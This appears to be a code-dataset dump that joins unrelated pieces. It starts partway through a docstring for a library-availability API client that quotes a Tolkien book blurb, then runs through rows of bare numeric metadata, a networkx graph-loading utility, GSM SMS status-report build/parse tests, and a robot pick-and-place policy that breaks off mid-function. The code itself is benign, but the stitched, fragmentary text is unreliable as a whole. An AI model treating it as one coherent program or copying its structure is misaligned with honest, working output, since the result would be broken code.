notes="First published by Harper Collins Publishers 2017.Includes abstractsThe epic tale of Beren and Lúthien became an essential element in the evolution of The Silmarillion, the myths and legends of J.R.R. Tolkien's First Age of the World. Always key to the story is the fate that shadowed their love: Beren was a mortal man, Lúthien an immortal Elf. Her father, a great Elvish lord, imposed on Beren an impossible task before he might wed Lúthien: to rob the greatest of all evil beings, Melkor, of a Silmaril.Painstakingly restored from Tolkien's manuscripts and presented for the first time as a continuous and standalone story, Beren and Lúthien reunites fans of The Hobbit and The Lord of the Rings with Elves and Men, along with the rich landscape and creatures unique to Tolkien's Middle-earth. Christopher Tolkien tells the story in his father's own words by giving its original form as well as prose and verse passages from later texts that illustrate the narrative as it changed. -- from back cover.",
isbn='1328915336 (paperback)',
issn=None,
n_title_name=None,
n_author=None,
n_publisher=None
)
)
"""
status: str
message: str
error_message: Optional[str]
title_detail: Optional[TitleDetail]
@dataclass
class Item:
"""
Part of `GetAvailabilityInfoResponse`.
:var str item_no:
:var str branch_id:
:var str branch_name:
:var str location_code:
:var str location_desc:
:var str call_number:
:var str status_code:
:var str status_desc:
:var Optional[str] media_code:
:var str media_desc:
:var str status_date:
:var Optional[str] due_date:
:var Optional[str] cluster_name:
:var Optional[str] category_name:
:var Optional[str] collection_code:
:var Optional[str] collection_min_age_limit:
:var bool available:
Example `Item`::
Item(
item_no='B33315118C',
branch_id='BBPL',
branch_name='Bukit Batok Public Library',
location_code='____',
location_desc='Adult Lending',
call_number='English TOL -[FN]',
status_code='C',
status_desc='On Loan',
media_code=None,
media_desc='Book',
status_date='08/11/2018',
due_date='08/11/2018',
cluster_name=None,
category_name=None,
collection_code=None,
collection_min_age_limit=None,
available=False,
)
"""
item_no: str
branch_id: str
branch_name: str
location_code: str
location_desc: str
call_number: str
status_code: str
status_desc: str
media_code: Optional[str]
media_desc: str
status_date: str
due_date: Optional[str]
cluster_name: Optional[str]
category_name: Optional[str]
collection_code: Optional[str]
collection_min_age_limit: Optional[str]
available: bool
@dataclass
class GetAvailabilityInfoResponse:
"""
Returned by `Client.get_availability_info`.
:var str status:
:var str message:
:var Optional[str] error_message:
:var Optional[int] next_record_position:
:var Optional[str] set_id:
:var Optional[Iterable[Item]] items:
Example `GetAvailabilityInfoResponse`::
GetAvailabilityInfoResponse(
status='OK',
message='Operation completed successfully',
error_message=None,
next_record_position=2,
set_id='3709',
items=tuple([
Item(
item_no='B33315114J',
branch_id='AMKPL',
branch_name='Ang Mo Kio Public Library',
location_code='____',
location_desc='Adult Lending',
call_number='English TOL -[FN]',
status_code='S',
status_desc='Not On Loan',
media_code=None,
media_desc='Book',
status_date='06/09/2018',
due_date=None,
cluster_name=None,
category_name=None,
collection_code=None,
collection_min_age_limit=None
),
Item(
item_no='B33315118C',
branch_id='BBPL',
branch_name='Bukit Batok Public Library',
location_code='____',
location_desc='Adult Lending',
call_number='English TOL -[FN]',
status_code='C',
status_desc='On Loan',
media_code=None,
media_desc='Book',
status_date='08/11/2018',
due_date='08/11/2018',
cluster_name=None,
category_name=None,
collection_code=None,
collection_min_age_limit=None
)
])
)
"""
status: str
message: str
error_message: Optional[str]
next_record_position: Optional[int]
set_id: Optional[str]
items: Optional[Iterable[Item]]
| 37.635015
| 1,029
| 0.65986
| 1,681
| 12,683
| 4.869126
| 0.149911
| 0.043006
| 0.005864
| 0.010996
| 0.759438
| 0.748076
| 0.731338
| 0.72474
| 0.719609
| 0.667929
| 0
| 0.025924
| 0.257904
| 12,683
| 336
| 1,030
| 37.747024
| 0.843391
| 0.865568
| 0
| 0.42029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.028986
| 0
| 0.913043
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
8a92aad089f81a1f86bc9e982d4f8c6b9bd9932a
| 2,903
|
py
|
Python
|
visualization/GraphUtil.py
|
4jinetes/BSF
|
86d477b1aca8a95be58f9608c6da375d3946be53
|
[
"MIT"
] | 67
|
2019-09-20T09:38:17.000Z
|
2022-03-19T13:05:54.000Z
|
visualization/GraphUtil.py
|
4jinetes/BSF
|
86d477b1aca8a95be58f9608c6da375d3946be53
|
[
"MIT"
] | null | null | null |
visualization/GraphUtil.py
|
4jinetes/BSF
|
86d477b1aca8a95be58f9608c6da375d3946be53
|
[
"MIT"
] | 30
|
2019-09-29T02:09:09.000Z
|
2021-12-27T02:18:11.000Z
|
import networkx as nx
import os
import re
#def init_graph(SOURCE_FILE, FILE_RESET=False):
# if os.path.isfile(SOURCE_FILE):
# print "File is read."
# G = nx.read_dot(SOURCE_FILE)
# else:
# print "Error! The specified source file does not exist."
# quit()
# print "Your Graph contains " + str(len(G.nodes())) + " nodes and " + str(len(G.edges())) + " edges."
# return G
def init_graph(SOURCE_FILE, FILE_RESET=False):
if os.path.isfile(SOURCE_FILE):
print("File is read.")
exp = re.compile(r'\"(\d+)\"->{(.*)}')
G = nx.DiGraph()
f = open(SOURCE_FILE, 'r')
for line in f:
res = exp.match(line)
if res:
n = res.group(1)
neighbors = res.group(2).replace('\"', "").split(" ")
for neighbor in neighbors:
if neighbor != '':
G.add_edge(int(n), int(neighbor))
f.close()
else:
print("Error! The specified source file does not exist.")
quit()
print("Your Graph contains " + str(len(G.nodes())) + " nodes and " + str(len(G.edges())) + " edges.")
return G
def init_multidigraph(SOURCE_FILE, FILE_RESET=False):
if os.path.isfile(SOURCE_FILE):
print("File is read.")
exp = re.compile(r'\"(\d+)\"->{(.*)}')
G = nx.MultiDiGraph()
f = open(SOURCE_FILE, 'r')
for line in f:
res = exp.match(line)
if res:
n = res.group(1)
neighbors = res.group(2).replace('\"', "").split(" ")
for neighbor in neighbors:
if neighbor != '':
G.add_edge(int(n), int(neighbor))
f.close()
else:
print("Error! The specified source file does not exist.")
quit()
print("Your Graph contains " + str(len(G.nodes())) + " nodes and " + str(len(G.edges())) + " edges.")
return G
def init_graph_clean(SOURCE_FILE, FILE_RESET=False, Verbose = False):
if os.path.isfile(SOURCE_FILE):
if Verbose:
print("File is read.")
exp = re.compile(r'\"(\d+)\"->{(.*)}')
G = nx.DiGraph()
f = open(SOURCE_FILE, 'r')
for line in f:
res = exp.match(line)
if res:
n = res.group(1)
neighbors = res.group(2).replace('\"', "").split(" ")
for neighbor in neighbors:
if not neighbor == '':
G.add_edge(int(n), int(neighbor))
f.close()
else:
print("Error! The specified source file does not exist.")
quit()
if Verbose:
print("Your Graph contains " + str(len(G.nodes())) + " nodes and " + str(len(G.edges())) + " edges.")
for node in G.nodes():
if G.out_degree(node) == 0:
G.remove_node(node)
return G
| 33.367816
| 109
| 0.503961
| 365
| 2,903
| 3.934247
| 0.189041
| 0.111421
| 0.038997
| 0.052925
| 0.885097
| 0.868384
| 0.868384
| 0.848189
| 0.848189
| 0.848189
| 0
| 0.003636
| 0.336893
| 2,903
| 86
| 110
| 33.755814
| 0.742338
| 0.12022
| 0
| 0.838235
| 0
| 0
| 0.141454
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044118
| false
| 0
| 0.044118
| 0
| 0.132353
| 0.132353
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8aa6abfe2adef69059ebfdbc8644b6f20310412d
| 20,420
|
py
|
Python
|
tests/test_sms/test_sms_status_report.py
|
matan1008/gsm-layer3-protocol
|
6e5cff082b2726e8cd7065f34badea527a720a6b
|
[
"MIT"
] | null | null | null |
tests/test_sms/test_sms_status_report.py
|
matan1008/gsm-layer3-protocol
|
6e5cff082b2726e8cd7065f34badea527a720a6b
|
[
"MIT"
] | null | null | null |
tests/test_sms/test_sms_status_report.py
|
matan1008/gsm-layer3-protocol
|
6e5cff082b2726e8cd7065f34badea527a720a6b
|
[
"MIT"
] | null | null | null |
from gsm_layer3_protocol import parse, build
from gsm_layer3_protocol.enums import *
from gsm_layer3_protocol.l3_message import L3Message
from gsm_layer3_protocol.sms_protocol.cp_data import CpData
from gsm_layer3_protocol.sms_protocol.rp_data import RpDataNToMs
from gsm_layer3_protocol.sms_protocol.sms_status_report import SmsStatusReport
from gsm_layer3_protocol.enums import bcd_number_plan as plan, \
bcd_type_of_number as number_type
from gsm_layer3_protocol.sms_protocol.called_party_bcd_address import \
AddressField
from gsm_layer3_protocol.sms_protocol.tp_user_data import TpUserData, \
TpUserDataHeader, TpUserDataHeaderElement
from gsm_layer3_protocol.sms_protocol.tpdu_parameters import TpScts, \
TpDcsGeneralDataCodingIndicationNoMessageClass, TpDt
def test_building_sms_status_report_with_data_header():
sms_status_report = SmsStatusReport(
tp_srq.SMS_SUBMIT,
tp_lp.NOT_FORWARDED_OR_SPAWNED,
tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
0xcc,
AddressField(
number_type.INTERNATIONAL_NUMBER,
plan.UNKNOWN,
"*3639"
),
TpScts(18, 9, 1, 23, 6, 0, 2),
TpDt(18, 9, 1, 23, 0, 0, 2),
tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
tp_pid.DEFAULT,
TpDcsGeneralDataCodingIndicationNoMessageClass(),
TpUserData(
"Deliver us!",
TpUserDataHeader(TpUserDataHeaderElement(
tp_udh_elements.CONCATENATED_SHORT_MESSAGES_8_BIT,
b"\x03\x02\x01"
))
)
)
assert build(L3Message(
3,
protocol_discriminator.SMS,
CpData(rp_mti.RP_DATA_N_TO_MS, RpDataNToMs(
1,
AddressField(
number_type.INTERNATIONAL_NUMBER,
plan.UNKNOWN,
"123456"
),
sms_status_report
))
)) == (b"\x39\x01\x33\x01\x01\x04\x90\x21\x43\x65\x00\x2a\x46\xcc\x05\x90"
b"\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90\x10\x32\x00\x00"
b"\x80\x00\x07\x00\x00\x12\x05\x00\x03\x03\x02\x01\x88\x65\x76\xda"
b"\x5e\x96\x83\xea\xf3\x10")
def test_parsing_sms_status_report_with_data_header():
assert parse(b"\x39\x01\x33\x01\x01\x04\x90\x21\x43\x65\x00\x2a\x46\xcc"
b"\x05\x90\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90"
b"\x10\x32\x00\x00\x80\x00\x07\x00\x00\x12\x05\x00\x03\x03"
b"\x02\x01\x88\x65\x76\xda\x5e\x96\x83\xea\xf3\x10") == {
"transaction_identifier": 3,
"protocol_discriminator": protocol_discriminator.SMS,
"l3_protocol": {
"message_type": message_type.CP_DATA,
"cp_layer_protocol": {
"spare": None,
"mti": rp_mti.RP_DATA_N_TO_MS,
"rp": {
"message_reference": 1,
"rp_originator_address": {
"ext": None,
"number": "123456",
"number_plan": plan.UNKNOWN,
"type_of_number": number_type.INTERNATIONAL_NUMBER
},
"rp_destination_address": 0,
"rp_user_data": {"tpdu": {
"tp_udhi": True,
"tp_srq": tp_srq.SMS_SUBMIT,
"tp_lp": tp_lp.NOT_FORWARDED_OR_SPAWNED,
"tp_mms": tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
"tp_mti": tp_mti.SMS_STATUS_OR_COMMAND,
"tp_mr": 0xcc,
"tp_ra": {
"ext": None,
"number": "*3639",
"number_plan": plan.UNKNOWN,
"type_of_number": number_type.INTERNATIONAL_NUMBER
},
"tp_scts": {
"day": 1,
"gmt": 2.0,
"hour": 23,
"minute": 6,
"month": 9,
"second": 0,
"year": 18
},
"tp_dt": {
"day": 1,
"gmt": 2.0,
"hour": 23,
"minute": 0,
"month": 9,
"second": 0,
"year": 18
},
"tp_st": tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
"tp_pi": {
"tp_udl": True,
"tp_dcs": True,
"tp_pid": True,
},
"tp_pid": tp_pid.DEFAULT,
"tp_dcs": {
"coding_group": dcs_coding_groups.GENERAL_DATA_CODING_INDICATION,
"character_set": dcs_character_set.GSM_7,
},
"tp_ud": {
"user_data_header": [
{
"element_type": tp_udh_elements.CONCATENATED_SHORT_MESSAGES_8_BIT,
"element_data": b"\x03\x02\x01"
}
],
"user_data": "Deliver us!"
}
}}
}
}
}
}
def test_building_sms_status_report_without_data_header():
sms_status_report = SmsStatusReport(
tp_srq.SMS_SUBMIT,
tp_lp.NOT_FORWARDED_OR_SPAWNED,
tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
0xcc,
AddressField(
number_type.INTERNATIONAL_NUMBER,
plan.UNKNOWN,
"*3639"
),
TpScts(18, 9, 1, 23, 6, 0, 2),
TpDt(18, 9, 1, 23, 0, 0, 2),
tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
tp_pid.DEFAULT,
TpDcsGeneralDataCodingIndicationNoMessageClass(),
TpUserData(
"Deliver us!"
)
)
assert build(L3Message(
3,
protocol_discriminator.SMS,
CpData(rp_mti.RP_DATA_N_TO_MS, RpDataNToMs(
1,
AddressField(
number_type.INTERNATIONAL_NUMBER,
plan.UNKNOWN,
"123456"
),
sms_status_report
))
)) == (b"\x39\x01\x2d\x01\x01\x04\x90\x21\x43\x65\x00\x24\x06\xcc\x05\x90"
b"\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90\x10\x32\x00\x00"
b"\x80\x00\x07\x00\x00\x0b\xc4\x32\x3b\x6d\x2f\xcb\x41\xf5\x79\x08")
def test_parsing_sms_status_report_without_data_header():
assert parse(b"\x39\x01\x2d\x01\x01\x04\x90\x21\x43\x65\x00\x24\x06\xcc"
b"\x05\x90\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90"
b"\x10\x32\x00\x00\x80\x00\x07\x00\x00\x0b\xc4\x32\x3b\x6d"
b"\x2f\xcb\x41\xf5\x79\x08") == {
"transaction_identifier": 3,
"protocol_discriminator": protocol_discriminator.SMS,
"l3_protocol": {
"message_type": message_type.CP_DATA,
"cp_layer_protocol": {
"spare": None,
"mti": rp_mti.RP_DATA_N_TO_MS,
"rp": {
"message_reference": 1,
"rp_originator_address": {
"ext": None,
"number": "123456",
"number_plan": plan.UNKNOWN,
"type_of_number": number_type.INTERNATIONAL_NUMBER
},
"rp_destination_address": 0,
"rp_user_data": {"tpdu": {
"tp_udhi": False,
"tp_srq": tp_srq.SMS_SUBMIT,
"tp_lp": tp_lp.NOT_FORWARDED_OR_SPAWNED,
"tp_mms": tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
"tp_mti": tp_mti.SMS_STATUS_OR_COMMAND,
"tp_mr": 0xcc,
"tp_ra": {
"ext": None,
"number": "*3639",
"number_plan": plan.UNKNOWN,
"type_of_number": number_type.INTERNATIONAL_NUMBER
},
"tp_scts": {
"day": 1,
"gmt": 2.0,
"hour": 23,
"minute": 6,
"month": 9,
"second": 0,
"year": 18
},
"tp_dt": {
"day": 1,
"gmt": 2.0,
"hour": 23,
"minute": 0,
"month": 9,
"second": 0,
"year": 18
},
"tp_st": tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
"tp_pi": {
"tp_udl": True,
"tp_dcs": True,
"tp_pid": True,
},
"tp_pid": tp_pid.DEFAULT,
"tp_dcs": {
"coding_group": dcs_coding_groups.GENERAL_DATA_CODING_INDICATION,
"character_set": dcs_character_set.GSM_7,
},
"tp_ud": {
"user_data_header": None,
"user_data": "Deliver us!"
}
}}
}
}
}
}
def test_building_sms_status_report_without_dcs():
sms_status_report = SmsStatusReport(
tp_srq.SMS_SUBMIT,
tp_lp.NOT_FORWARDED_OR_SPAWNED,
tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
0xcc,
AddressField(
number_type.INTERNATIONAL_NUMBER,
plan.UNKNOWN,
"*3639"
),
TpScts(18, 9, 1, 23, 6, 0, 2),
TpDt(18, 9, 1, 23, 0, 0, 2),
tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
tp_pid=tp_pid.DEFAULT,
tp_ud=TpUserData(
"Deliver us!",
TpUserDataHeader(TpUserDataHeaderElement(
tp_udh_elements.CONCATENATED_SHORT_MESSAGES_8_BIT,
b"\x03\x02\x01"
))
)
)
assert build(L3Message(
3,
protocol_discriminator.SMS,
CpData(rp_mti.RP_DATA_N_TO_MS, RpDataNToMs(
1,
AddressField(
number_type.INTERNATIONAL_NUMBER,
plan.UNKNOWN,
"123456"
),
sms_status_report
))
)) == (b"\x39\x01\x32\x01\x01\x04\x90\x21\x43\x65\x00\x29\x46\xcc\x05\x90"
b"\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90\x10\x32\x00\x00"
b"\x80\x00\x05\x00\x12\x05\x00\x03\x03\x02\x01\x88\x65\x76\xda\x5e"
b"\x96\x83\xea\xf3\x10")
def test_parsing_sms_status_report_without_dcs():
assert parse(b"\x39\x01\x32\x01\x01\x04\x90\x21\x43\x65\x00\x29\x46\xcc"
b"\x05\x90\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90"
b"\x10\x32\x00\x00\x80\x00\x05\x00\x12\x05\x00\x03\x03\x02"
b"\x01\x88\x65\x76\xda\x5e\x96\x83\xea\xf3\x10") == {
"transaction_identifier": 3,
"protocol_discriminator": protocol_discriminator.SMS,
"l3_protocol": {
"message_type": message_type.CP_DATA,
"cp_layer_protocol": {
"spare": None,
"mti": rp_mti.RP_DATA_N_TO_MS,
"rp": {
"message_reference": 1,
"rp_originator_address": {
"ext": None,
"number": "123456",
"number_plan": plan.UNKNOWN,
"type_of_number": number_type.INTERNATIONAL_NUMBER
},
"rp_destination_address": 0,
"rp_user_data": {"tpdu": {
"tp_udhi": True,
"tp_srq": tp_srq.SMS_SUBMIT,
"tp_lp": tp_lp.NOT_FORWARDED_OR_SPAWNED,
"tp_mms": tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
"tp_mti": tp_mti.SMS_STATUS_OR_COMMAND,
"tp_mr": 0xcc,
"tp_ra": {
"ext": None,
"number": "*3639",
"number_plan": plan.UNKNOWN,
"type_of_number": number_type.INTERNATIONAL_NUMBER
},
"tp_scts": {
"day": 1,
"gmt": 2.0,
"hour": 23,
"minute": 6,
"month": 9,
"second": 0,
"year": 18
},
"tp_dt": {
"day": 1,
"gmt": 2.0,
"hour": 23,
"minute": 0,
"month": 9,
"second": 0,
"year": 18
},
"tp_st": tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
"tp_pi": {
"tp_udl": True,
"tp_dcs": False,
"tp_pid": True,
},
"tp_pid": tp_pid.DEFAULT,
"tp_dcs": {
"character_set": dcs_character_set.GSM_7,
},
"tp_ud": {
"user_data_header": [
{
"element_type": tp_udh_elements.CONCATENATED_SHORT_MESSAGES_8_BIT,
"element_data": b"\x03\x02\x01"
}
],
"user_data": "Deliver us!"
}
}}
}
}
}
}
def test_building_sms_status_report_without_optionals():
sms_status_report = SmsStatusReport(
tp_srq.SMS_SUBMIT,
tp_lp.NOT_FORWARDED_OR_SPAWNED,
tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
0xcc,
AddressField(
number_type.INTERNATIONAL_NUMBER,
plan.UNKNOWN,
"*3639"
),
TpScts(18, 9, 1, 23, 6, 0, 2),
TpDt(18, 9, 1, 23, 0, 0, 2),
tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME
)
assert build(L3Message(
3,
protocol_discriminator.SMS,
CpData(rp_mti.RP_DATA_N_TO_MS, RpDataNToMs(
1,
AddressField(
number_type.INTERNATIONAL_NUMBER,
plan.UNKNOWN,
"123456"
),
sms_status_report
))
)) == (b"\x39\x01\x20\x01\x01\x04\x90\x21\x43\x65\x00\x17\x06\xcc\x05\x90"
b"\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90\x10\x32\x00\x00"
b"\x80\x00\x00")
def test_parsing_sms_status_report_without_optionals():
assert parse(b"\x39\x01\x20\x01\x01\x04\x90\x21\x43\x65\x00\x17\x06\xcc"
b"\x05\x90\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90"
b"\x10\x32\x00\x00\x80\x00\x00") == {
"transaction_identifier": 3,
"protocol_discriminator": protocol_discriminator.SMS,
"l3_protocol": {
"message_type": message_type.CP_DATA,
"cp_layer_protocol": {
"spare": None,
"mti": rp_mti.RP_DATA_N_TO_MS,
"rp": {
"message_reference": 1,
"rp_originator_address": {
"ext": None,
"number": "123456",
"number_plan": plan.UNKNOWN,
"type_of_number": number_type.INTERNATIONAL_NUMBER
},
"rp_destination_address": 0,
"rp_user_data": {"tpdu": {
"tp_udhi": False,
"tp_srq": tp_srq.SMS_SUBMIT,
"tp_lp": tp_lp.NOT_FORWARDED_OR_SPAWNED,
"tp_mms": tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
"tp_mti": tp_mti.SMS_STATUS_OR_COMMAND,
"tp_mr": 0xcc,
"tp_ra": {
"ext": None,
"number": "*3639",
"number_plan": plan.UNKNOWN,
"type_of_number": number_type.INTERNATIONAL_NUMBER
},
"tp_scts": {
"day": 1,
"gmt": 2.0,
"hour": 23,
"minute": 6,
"month": 9,
"second": 0,
"year": 18
},
"tp_dt": {
"day": 1,
"gmt": 2.0,
"hour": 23,
"minute": 0,
"month": 9,
"second": 0,
"year": 18
},
"tp_st": tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
"tp_pi": {
"tp_udl": False,
"tp_dcs": False,
"tp_pid": False,
},
"tp_pid": None,
"tp_dcs": {
"character_set": dcs_character_set.GSM_7,
},
"tp_ud": None
}}
}
}
}
}
| 43.72591
| 109
| 0.386729
| 1,779
| 20,420
| 4.11973
| 0.102305
| 0.025788
| 0.034793
| 0.06331
| 0.942011
| 0.933006
| 0.88566
| 0.868331
| 0.868331
| 0.868331
| 0
| 0.101757
| 0.520666
| 20,420
| 466
| 110
| 43.819742
| 0.647017
| 0
| 0
| 0.764444
| 0
| 0.053333
| 0.171841
| 0.089912
| 0
| 0
| 0.001567
| 0
| 0.017778
| 1
| 0.017778
| false
| 0
| 0.022222
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8aad139e3c89ef75f7fd43231e896d072d6199a6
| 18,843
|
py
|
Python
|
roboverse/policies/pick_place.py
|
VentusYue/roboverse
|
bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d
|
[
"MIT"
] | null | null | null |
roboverse/policies/pick_place.py
|
VentusYue/roboverse
|
bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d
|
[
"MIT"
] | null | null | null |
roboverse/policies/pick_place.py
|
VentusYue/roboverse
|
bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d
|
[
"MIT"
] | null | null | null |
import numpy as np
import roboverse.bullet as bullet
from roboverse.assets.shapenet_object_lists import GRASP_OFFSETS
from .drawer_open_transfer import DrawerOpenTransfer
from roboverse.utils.general_utils import alpha_between_vec
class PickPlace:
def __init__(self, env, pick_height_thresh=-0.31, xyz_action_scale=7.0,
pick_point_noise=0.00, drop_point_noise=0.00):
self.env = env
self.pick_height_thresh_noisy = (
pick_height_thresh + np.random.normal(scale=0.01))
self.xyz_action_scale = xyz_action_scale
self.pick_point_noise = pick_point_noise
self.drop_point_noise = drop_point_noise
self.reset()
def reset(self):
# self.dist_thresh = 0.06 + np.random.normal(scale=0.01)
self.object_to_target = self.env.object_names[
np.random.randint(self.env.num_objects)]
self.pick_point = bullet.get_object_position(
self.env.objects[self.object_to_target])[0]
if self.object_to_target in GRASP_OFFSETS.keys():
self.pick_point += np.asarray(GRASP_OFFSETS[self.object_to_target])
self.pick_point[2] = -0.32
self.drop_point = self.env.container_position
self.drop_point[2] = -0.32
self.place_attempted = False
def get_action(self):
ee_pos, _ = bullet.get_link_state(
self.env.robot_id, self.env.end_effector_index)
object_pos, _ = bullet.get_object_position(
self.env.objects[self.object_to_target])
object_lifted = object_pos[2] > self.pick_height_thresh_noisy
gripper_pickpoint_dist = np.linalg.norm(self.pick_point - ee_pos)
gripper_droppoint_dist = np.linalg.norm(self.drop_point - ee_pos)
done = False
# import pdb; pdb.set_trace()
if self.place_attempted:
# Avoid pick and place the object again after one attempt
action_xyz = [0., 0., 0.]
action_angles = [0., 0., 0.]
action_gripper = [0.]
elif gripper_pickpoint_dist > 0.02 and self.env.is_gripper_open:
# move near the object
action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
xy_diff = np.linalg.norm(action_xyz[:2] / self.xyz_action_scale)
if xy_diff > 0.03:
action_xyz[2] = 0.0
action_angles = [0., 0., 0.]
action_gripper = [0.0]
elif self.env.is_gripper_open:
# near the object enough, performs grasping action
action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
action_angles = [0., 0., 0.]
action_gripper = [-0.8]
elif not object_lifted:
# lifting objects above the height threshold for picking
action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
action_angles = [0., 0., 0.]
action_gripper = [0.]
elif gripper_droppoint_dist > 0.02:
# lifted, now need to move towards the container
action_xyz = (self.drop_point - ee_pos) * self.xyz_action_scale
action_angles = [0., 0., 0.]
action_gripper = [0.]
else:
# already moved above the container; drop object
action_xyz = (0., 0., 0.)
action_angles = [0., 0., 0.]
action_gripper = [0.7]
self.place_attempted = True
agent_info = dict(place_attempted=self.place_attempted, done=done)
neutral_action = [0.]
action = np.concatenate(
(action_xyz, action_angles, action_gripper, neutral_action))
return action, agent_info
class PickPlaceOpen:
def __init__(self, env, pick_height_thresh=-0.31, xyz_action_scale=7.0,
pick_point_z=-0.32, suboptimal=False):
self.env = env
self.pick_height_thresh_noisy = (
pick_height_thresh + np.random.normal(scale=0.01))
self.xyz_action_scale = xyz_action_scale
self.pick_point_z = pick_point_z
self.suboptimal = suboptimal
self.drawer_policy = DrawerOpenTransfer(env, suboptimal=self.suboptimal)
self.reset()
def reset(self):
self.pick_point = bullet.get_object_position(self.env.blocking_object)[0]
self.pick_point[2] = self.pick_point_z
self.drop_point = bullet.get_object_position(self.env.tray_id)[0]
self.drop_point[2] = -0.2
if self.suboptimal and np.random.uniform() > 0.5:
self.drop_point[0] += np.random.uniform(-0.2, 0.0)
self.drop_point[1] += np.random.uniform(0.0, 0.2)
self.place_attempted = False
self.neutral_taken = False
self.drawer_policy.reset()
def get_action(self):
ee_pos, _ = bullet.get_link_state(
self.env.robot_id, self.env.end_effector_index)
object_pos, _ = bullet.get_object_position(self.env.blocking_object)
object_lifted = object_pos[2] > self.pick_height_thresh_noisy
gripper_pickpoint_dist = np.linalg.norm(self.pick_point - ee_pos)
gripper_droppoint_dist = np.linalg.norm(self.drop_point - ee_pos)
done = False
neutral_action = [0.]
if self.place_attempted:
# Return to neutral, then open the drawer.
if self.neutral_taken:
action, info = self.drawer_policy.get_action()
action_xyz = action[:3]
action_angles = action[3:6]
action_gripper = [action[6]]
neutral_action = [action[7]]
done = info['done']
else:
action_xyz = [0., 0., 0.]
action_angles = [0., 0., 0.]
action_gripper = [0.0]
neutral_action = [0.7]
self.neutral_taken = True
elif gripper_pickpoint_dist > 0.02 and self.env.is_gripper_open:
# move near the object
action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
xy_diff = np.linalg.norm(action_xyz[:2] / self.xyz_action_scale)
if xy_diff > 0.03:
action_xyz[2] = 0.0
action_angles = [0., 0., 0.]
action_gripper = [0.0]
elif self.env.is_gripper_open:
# near the object enough, performs grasping action
action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
action_angles = [0., 0., 0.]
action_gripper = [-0.7]
elif not object_lifted:
# lifting objects above the height threshold for picking
action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
action_angles = [0., 0., 0.]
action_gripper = [0.]
elif gripper_droppoint_dist > 0.02:
# lifted, now need to move towards the container
action_xyz = (self.drop_point - ee_pos) * self.xyz_action_scale
action_angles = [0., 0., 0.]
action_gripper = [0.]
else:
# already moved above the container; drop object
action_xyz = [0., 0., 0.]
action_angles = [0., 0., 0.]
action_gripper = [0.7]
self.place_attempted = True
agent_info = dict(place_attempted=self.place_attempted, done=done)
action = np.concatenate(
(action_xyz, action_angles, action_gripper, neutral_action))
return action, agent_info
class PickPlaceOpenSuboptimal(PickPlaceOpen):
def __init__(self, env, **kwargs):
super(PickPlaceOpenSuboptimal, self).__init__(
env, suboptimal=True, **kwargs,
)
class PickPlaceOld:
def __init__(self, env, pick_height_thresh=-0.31):
self.env = env
self.pick_height_thresh_noisy = (
pick_height_thresh + np.random.normal(scale=0.01))
self.xyz_action_scale = 7.0
self.reset()
def reset(self):
self.dist_thresh = 0.06 + np.random.normal(scale=0.01)
self.place_attempted = False
self.object_to_target = self.env.object_names[
np.random.randint(self.env.num_objects)]
def get_action(self):
ee_pos, _ = bullet.get_link_state(
self.env.robot_id, self.env.end_effector_index)
object_pos, _ = bullet.get_object_position(
self.env.objects[self.object_to_target])
object_lifted = object_pos[2] > self.pick_height_thresh_noisy
object_gripper_dist = np.linalg.norm(object_pos - ee_pos)
container_pos = self.env.container_position
target_pos = np.append(container_pos[:2], container_pos[2] + 0.15)
target_pos = target_pos + np.random.normal(scale=0.01)
gripper_target_dist = np.linalg.norm(target_pos - ee_pos)
